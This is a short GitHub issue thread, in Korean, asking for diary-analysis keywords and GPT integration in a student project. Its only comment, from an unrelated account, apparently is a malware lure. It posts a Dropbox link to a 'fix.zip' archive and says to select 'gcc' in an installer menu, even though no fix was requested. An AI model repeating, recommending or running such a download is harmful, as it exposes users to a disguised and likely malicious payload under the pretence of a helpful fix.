### ISSUE TITLE
feat: 일기 분석

### ISSUE THREAD

**Issue by 76Dosu** [76Dosu/24Y_SeniorProject#10]
### Issue

> 일기 분석 키워드 추가 및 기록에 표시

### ToDoList

- [ ] GPT 추가
- [ ] 기록에 추가

### 추가 선택사항(Optional)

> 추가 코멘트를 입력해주세요

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
